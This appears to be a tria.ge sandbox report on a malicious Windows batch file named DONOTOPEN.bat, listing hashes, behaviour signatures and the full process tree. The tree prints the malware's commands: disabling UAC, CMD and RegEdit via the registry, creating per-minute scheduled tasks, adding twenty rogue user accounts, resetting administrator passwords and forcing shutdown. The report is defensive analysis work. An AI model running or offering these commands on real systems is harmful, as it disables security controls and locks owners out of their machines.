Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Resubmissions

30/04/2024, 15:25

240430-stvz7shh7t 10

30/04/2024, 13:57

240430-q9acbsge4x 10

Analysis

  • max time kernel
    34s
  • platform
    windows11-21h2_x64
  • resource
    win11-20240426-en
  • resource tags

    arch:x64arch:x86image:win11-20240426-enlocale:en-usos:windows11-21h2-x64system
  • submitted
    30/04/2024, 15:25

General

  • Target

    DONOTOPEN.bat

  • Size

    9KB

  • MD5

    4d53c3d83c92387b73339017093a82d0

  • SHA1

    e38992e8b91986cf21052a1cfecedba8a3b6fea6

  • SHA256

    6e5d2734a8ed929fbd2862aff022a597b8418dfef0207df1a772f8372790ae76

  • SHA512

    7122c7d7b2551ef847e94537971ef159570fe812bae9e8f0defb31afd997cc861919f0a1ad476079ad01b95b3aecb6b506bb6ecc83e95d5c3758903fe6706644

  • SSDEEP

    192:UlM+642KhNglPgYCbYBYRCNn9DU2U+ma+RGDzuQj:UlMH4Rh06oU2U+b+sSQj

Malware Config

Signatures

  • UAC bypass 3 TTPs 1 IoCs
  • Disables RegEdit via registry modification 1 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Drops file in Windows directory 3 IoCs
  • Creates scheduled task(s) 1 TTPs 3 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Kills process with taskkill 1 IoCs
  • Modifies registry key 1 TTPs 6 IoCs
  • Runs net.exe
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\DONOTOPEN.bat"
    1⤵
    • Drops file in Windows directory
    • Suspicious use of WriteProcessMemory
    PID:1136
    • C:\Windows\system32\certutil.exe
      certutil -decode a start.bat
      2⤵
      • Drops file in Windows directory
      PID:4560
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /K start.bat
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2788
      • C:\Windows\system32\taskkill.exe
        TASKKILL /f /im explorer.exe
        3⤵
        • Kills process with taskkill
        • Suspicious use of AdjustPrivilegeToken
        PID:3696
      • C:\Windows\System32\cmd.exe
        C:\Windows\System32\cmd.exe /c C:\Windows\System32\reg.exe ADD HKCU\Software\Policies\Microsoft\Windows\System /v DisableCMD /t REG_DWORD /d 2 /f
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:3288
        • C:\Windows\System32\reg.exe
          C:\Windows\System32\reg.exe ADD HKCU\Software\Policies\Microsoft\Windows\System /v DisableCMD /t REG_DWORD /d 2 /f
          4⤵
          • Modifies registry key
          PID:416
      • C:\Windows\System32\cmd.exe
        C:\Windows\System32\cmd.exe /c C:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:2540
        • C:\Windows\System32\reg.exe
          C:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
          4⤵
          • UAC bypass
          • Modifies registry key
          PID:2204
      • C:\Windows\System32\cmd.exe
        C:\Windows\System32\cmd.exe /c C:\Windows\System32\reg.exe ADD HKCU\Software\Policies\Microsoft\Windows\System /v NoRun /t REG_DWORD /d 1 /f
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:684
        • C:\Windows\System32\reg.exe
          C:\Windows\System32\reg.exe ADD HKCU\Software\Policies\Microsoft\Windows\System /v NoRun /t REG_DWORD /d 1 /f
          4⤵
          • Modifies registry key
          PID:916
      • C:\Windows\System32\cmd.exe
        C:\Windows\System32\cmd.exe /c C:\Windows\System32\reg.exe ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableRegistryTools /t REG_DWORD /d 1 /f
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:4748
        • C:\Windows\System32\reg.exe
          C:\Windows\System32\reg.exe ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableRegistryTools /t REG_DWORD /d 1 /f
          4⤵
          • Disables RegEdit via registry modification
          • Modifies registry key
          PID:1684
      • C:\Windows\System32\cmd.exe
        C:\Windows\System32\cmd.exe /c C:\Windows\System32\reg.exe ADD HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System /v legalnoticecaption /t REG_SZ /d "Uh oh, something's wrong..." /f
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:4604
        • C:\Windows\System32\reg.exe
          C:\Windows\System32\reg.exe ADD HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System /v legalnoticecaption /t REG_SZ /d "Uh oh, something's wrong..." /f
          4⤵
          • Modifies registry key
          PID:2592
      • C:\Windows\System32\cmd.exe
        C:\Windows\System32\cmd.exe /c C:\Windows\System32\reg.exe ADD HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System /v legalnoticetext /t REG_SZ /d "Check README.txt dropped on your desktop for more information" /f
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:1372
        • C:\Windows\System32\reg.exe
          C:\Windows\System32\reg.exe ADD HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System /v legalnoticetext /t REG_SZ /d "Check README.txt dropped on your desktop for more information" /f
          4⤵
          • Modifies registry key
          PID:1444
      • C:\Windows\system32\schtasks.exe
        SCHTASKS /Create /SC MINUTE /MO 1 /TN virusalert /TR C:\Users\Admin\AppData\LocalLow\Microsoft\WindowsDefenderFuckService\alert.bat /IT
        3⤵
        • Creates scheduled task(s)
        PID:4904
      • C:\Windows\system32\schtasks.exe
        SCHTASKS /Create /SC MINUTE /MO 1 /TN firewallaelrt /TR C:\Users\Admin\AppData\LocalLow\Microsoft\WindowsDefenderFuckService\alert.vbs /IT
        3⤵
        • Creates scheduled task(s)
        PID:2176
      • C:\Windows\system32\schtasks.exe
        SCHTASKS /Create /SC MINUTE /MO 1 /TN DefenderTotalFuck /TR C:\Users\Admin\AppData\LocalLow\Microsoft\WindowsDefenderFuckService\runit.bat /IT
        3⤵
        • Creates scheduled task(s)
        PID:4596
      • C:\Windows\system32\net.exe
        NET USER HACKER001 Trash0001 /add
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:1812
        • C:\Windows\system32\net1.exe
          C:\Windows\system32\net1 USER HACKER001 Trash0001 /add
          4⤵
            PID:4436
        • C:\Windows\system32\net.exe
          NET USER HACKER002 Trash0001 /add
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:2396
          • C:\Windows\system32\net1.exe
            C:\Windows\system32\net1 USER HACKER002 Trash0001 /add
            4⤵
              PID:3704
          • C:\Windows\system32\net.exe
            NET USER HACKER003 Trash0001 /add
            3⤵
            • Suspicious use of WriteProcessMemory
            PID:1768
            • C:\Windows\system32\net1.exe
              C:\Windows\system32\net1 USER HACKER003 Trash0001 /add
              4⤵
                PID:3848
            • C:\Windows\system32\net.exe
              NET USER HACKER004 Trash0001 /add
              3⤵
              • Suspicious use of WriteProcessMemory
              PID:4820
              • C:\Windows\system32\net1.exe
                C:\Windows\system32\net1 USER HACKER004 Trash0001 /add
                4⤵
                  PID:2104
              • C:\Windows\system32\net.exe
                NET USER HACKER005 Trash0001 /add
                3⤵
                • Suspicious use of WriteProcessMemory
                PID:3332
                • C:\Windows\system32\net1.exe
                  C:\Windows\system32\net1 USER HACKER005 Trash0001 /add
                  4⤵
                    PID:3648
                • C:\Windows\system32\net.exe
                  NET USER HACKER006 Trash0001 /add
                  3⤵
                  • Suspicious use of WriteProcessMemory
                  PID:2976
                  • C:\Windows\system32\net1.exe
                    C:\Windows\system32\net1 USER HACKER006 Trash0001 /add
                    4⤵
                      PID:4160
                  • C:\Windows\system32\net.exe
                    NET USER HACKER007 Trash0001 /add
                    3⤵
                    • Suspicious use of WriteProcessMemory
                    PID:1052
                    • C:\Windows\system32\net1.exe
                      C:\Windows\system32\net1 USER HACKER007 Trash0001 /add
                      4⤵
                        PID:2424
                    • C:\Windows\system32\net.exe
                      NET USER HACKER008 Trash0001 /add
                      3⤵
                        PID:2580
                        • C:\Windows\system32\net1.exe
                          C:\Windows\system32\net1 USER HACKER008 Trash0001 /add
                          4⤵
                            PID:1532
                        • C:\Windows\system32\net.exe
                          NET USER HACKER009 Trash0001 /add
                          3⤵
                            PID:1360
                            • C:\Windows\system32\net1.exe
                              C:\Windows\system32\net1 USER HACKER009 Trash0001 /add
                              4⤵
                                PID:1008
                            • C:\Windows\system32\net.exe
                              NET USER HACKER010 Trash0001 /add
                              3⤵
                                PID:2044
                                • C:\Windows\system32\net1.exe
                                  C:\Windows\system32\net1 USER HACKER010 Trash0001 /add
                                  4⤵
                                    PID:3832
                                • C:\Windows\system32\net.exe
                                  NET USER HACKER011 Trash0001 /add
                                  3⤵
                                    PID:4900
                                    • C:\Windows\system32\net1.exe
                                      C:\Windows\system32\net1 USER HACKER011 Trash0001 /add
                                      4⤵
                                        PID:4896
                                    • C:\Windows\system32\net.exe
                                      NET USER HACKER012 Trash0001 /add
                                      3⤵
                                        PID:764
                                        • C:\Windows\system32\net1.exe
                                          C:\Windows\system32\net1 USER HACKER012 Trash0001 /add
                                          4⤵
                                            PID:428
                                        • C:\Windows\system32\net.exe
                                          NET USER HACKER013 Trash0001 /add
                                          3⤵
                                            PID:2184
                                            • C:\Windows\system32\net1.exe
                                              C:\Windows\system32\net1 USER HACKER013 Trash0001 /add
                                              4⤵
                                                PID:8
                                            • C:\Windows\system32\net.exe
                                              NET USER HACKER014 Trash0001 /add
                                              3⤵
                                                PID:2004
                                                • C:\Windows\system32\net1.exe
                                                  C:\Windows\system32\net1 USER HACKER014 Trash0001 /add
                                                  4⤵
                                                    PID:2400
                                                • C:\Windows\system32\net.exe
                                                  NET USER HACKER015 Trash0001 /add
                                                  3⤵
                                                    PID:4548
                                                    • C:\Windows\system32\net1.exe
                                                      C:\Windows\system32\net1 USER HACKER015 Trash0001 /add
                                                      4⤵
                                                        PID:4636
                                                    • C:\Windows\system32\net.exe
                                                      NET USER HACKER016 Trash0001 /add
                                                      3⤵
                                                        PID:4884
                                                        • C:\Windows\system32\net1.exe
                                                          C:\Windows\system32\net1 USER HACKER016 Trash0001 /add
                                                          4⤵
                                                            PID:4480
                                                        • C:\Windows\system32\net.exe
                                                          NET USER HACKER017 Trash0001 /add
                                                          3⤵
                                                            PID:3340
                                                            • C:\Windows\system32\net1.exe
                                                              C:\Windows\system32\net1 USER HACKER017 Trash0001 /add
                                                              4⤵
                                                                PID:3372
                                                            • C:\Windows\system32\net.exe
                                                              NET USER HACKER018 Trash0001 /add
                                                              3⤵
                                                                PID:3452
                                                                • C:\Windows\system32\net1.exe
                                                                  C:\Windows\system32\net1 USER HACKER018 Trash0001 /add
                                                                  4⤵
                                                                    PID:4288
                                                                • C:\Windows\system32\net.exe
                                                                  NET USER HACKER019 Trash0001 /add
                                                                  3⤵
                                                                    PID:4232
                                                                    • C:\Windows\system32\net1.exe
                                                                      C:\Windows\system32\net1 USER HACKER019 Trash0001 /add
                                                                      4⤵
                                                                        PID:4524
                                                                    • C:\Windows\system32\net.exe
                                                                      NET USER HACKER020 Trash0001 /add
                                                                      3⤵
                                                                        PID:3100
                                                                        • C:\Windows\system32\net1.exe
                                                                          C:\Windows\system32\net1 USER HACKER020 Trash0001 /add
                                                                          4⤵
                                                                            PID:2084
                                                                        • C:\Windows\system32\net.exe
                                                                          NET USER Administrator Trashedpc01
                                                                          3⤵
                                                                            PID:1716
                                                                            • C:\Windows\system32\net1.exe
                                                                              C:\Windows\system32\net1 USER Administrator Trashedpc01
                                                                              4⤵
                                                                                PID:3776
                                                                            • C:\Windows\system32\net.exe
                                                                              NET USER Admin Trashedpc01
                                                                              3⤵
                                                                                PID:4864
                                                                                • C:\Windows\system32\net1.exe
                                                                                  C:\Windows\system32\net1 USER Admin Trashedpc01
                                                                                  4⤵
                                                                                    PID:4796
                                                                                • C:\Windows\system32\shutdown.exe
                                                                                  shutdown /s /t 5 /c You are an idiot! HAHAHAHAHAHAHA
                                                                                  3⤵
                                                                                    PID:2412
                                                                              • C:\Windows\SYSTEM32\cmd.exe
                                                                                C:\Windows\SYSTEM32\cmd.exe /c "C:\Users\Admin\AppData\LocalLow\Microsoft\WindowsDefenderFuckService\alert.bat"
                                                                                1⤵
                                                                                  PID:5032
                                                                                • C:\Windows\System32\WScript.exe
                                                                                  C:\Windows\System32\WScript.exe "C:\Users\Admin\AppData\LocalLow\Microsoft\WindowsDefenderFuckService\alert.vbs"
                                                                                  1⤵
                                                                                    PID:4888
                                                                                  • C:\Windows\SYSTEM32\cmd.exe
                                                                                    C:\Windows\SYSTEM32\cmd.exe /c "C:\Users\Admin\AppData\LocalLow\Microsoft\WindowsDefenderFuckService\runit.bat"
                                                                                    1⤵
                                                                                      PID:1556
                                                                                      • C:\Windows\system32\schtasks.exe
                                                                                        SCHTASKS /Run /TN virusalert
                                                                                        2⤵
                                                                                          PID:4220
                                                                                        • C:\Windows\system32\schtasks.exe
                                                                                          SCHTASKS /Run /TN firewallalert
                                                                                          2⤵
                                                                                            PID:1432

                                                                                        Network

                                                                                        MITRE ATT&CK Enterprise v15

                                                                                        Replay Monitor

                                                                                        Loading Replay Monitor...

                                                                                        Downloads

                                                                                        • C:\Users\Admin\AppData\LocalLow\Microsoft\WindowsDefenderFuckService\alert.bat

                                                                                          Filesize

                                                                                          435B

                                                                                          MD5

                                                                                          ab1b7b617bc14004ba2291b28ba1a13c

                                                                                          SHA1

                                                                                          76bc336ea75743db95742df682a7f1bd5d495a9b

                                                                                          SHA256

                                                                                          9d1f99df292cc3c17df264810458358c4b303236150a7447c6c5a299067e5530

                                                                                          SHA512

                                                                                          1d42fa77bbe1f83c216c37cde9acada960110078bf9705997c056c5ca975e15e20488ca6a13232a8ebe885cbabeeac21887932568bbb038e204dd9e190cbe74c

                                                                                        • C:\Users\Admin\AppData\LocalLow\Microsoft\WindowsDefenderFuckService\alert.vbs

                                                                                          Filesize

                                                                                          896B

                                                                                          MD5

                                                                                          1c0a55a868aa2003dcb51e010d3b566e

                                                                                          SHA1

                                                                                          f63c853e91f094af8f6c0db0a79979838845c38d

                                                                                          SHA256

                                                                                          fd72a0fb87595ff91d3c78a5e7eb584ee347c35d6b1466841a675bb23158c426

                                                                                          SHA512

                                                                                          ce55e13f2b3b9b4e6d641114bc7a6ee6543be65b206f0ab6fa081d2bef580232cce6b59626e62f32982b9cbb1bf6c4fc093c7891528c8bda88ebc6b112ea803a

                                                                                        • C:\Users\Admin\AppData\LocalLow\Microsoft\WindowsDefenderFuckService\runit.bat

                                                                                          Filesize

                                                                                          65B

                                                                                          MD5

                                                                                          5d98878f4cec866f540d627a905b5dc9

                                                                                          SHA1

                                                                                          6ad61fd942be1dba4130cc51c1b5f11dad6558cb

                                                                                          SHA256

                                                                                          0f7e7769567ebfac514d5ca738644fcbbb3194e963a9be65f17e62f58075360d

                                                                                          SHA512

                                                                                          5146f84d2e39a43ba7592bc8f9e99ee1174f2effaee4a4b5ecffcce554760eb1f8264de13e50cc9b36ddeeeb8ba6a5d868b287548c901a3de2f998eb67ec4f16

                                                                                        • C:\Windows\a

                                                                                          Filesize

                                                                                          8KB

                                                                                          MD5

                                                                                          65888f1a707233e12b232b53ae1a7b77

                                                                                          SHA1

                                                                                          be27cd99043bc7cdf220a5d396aa46e6292bc87d

                                                                                          SHA256

                                                                                          e6ce11f3c97c2e62a41a1a5c01a5fc3391d39e6ef1c45c3134ce1cd182995b97

                                                                                          SHA512

                                                                                          0ed36491f4386f78a4a8a8099a3fa4bc78852a467aee524a06b2a75a68d1b9f437efb9ba2eab5c7ffc4e71bdbbf93b6820ea25134f22fc76e9cf5acab053831f

                                                                                        • C:\Windows\a

                                                                                          Filesize

                                                                                          4KB

                                                                                          MD5

                                                                                          53d27ec4d1ee59de6ccce556bcee63ab

                                                                                          SHA1

                                                                                          c9f1a39f1f8fa7047acde3be5dc8321e4fe238b0

                                                                                          SHA256

                                                                                          c2b977bdbd6df8e045ca51961b8c5a47ffd1017a27e24c90da19fcedff818d10

                                                                                          SHA512

                                                                                          7a38cc222d3806dfba0dc7deff1361e8f73f995230b69fd1054a3ee03345331a751ab9e78debfdaa4c988f9d25ae72215b51520eb8cbecb17db68bf716fe855f

                                                                                        • C:\Windows\start.bat

                                                                                          Filesize

                                                                                          5KB

                                                                                          MD5

                                                                                          92001ff0cdf2d1734fa43ca0b7b53e86

                                                                                          SHA1

                                                                                          ec6c837d9ee3bc2037ce2889748a353a6f8a1d29

                                                                                          SHA256

                                                                                          ba66ffcd3ae6ce6ee7dc74c639791ab454afab6b124ce11be2131f99e37a2b6d

                                                                                          SHA512

                                                                                          7f0d8ba2adb6305b0f30e1800775f107c30b691c2a2ae04420efb9f70fb237ecfb0e3e945825bef887f1ed6dfc3145b2d724e9505c01de551ae99cf98558d91e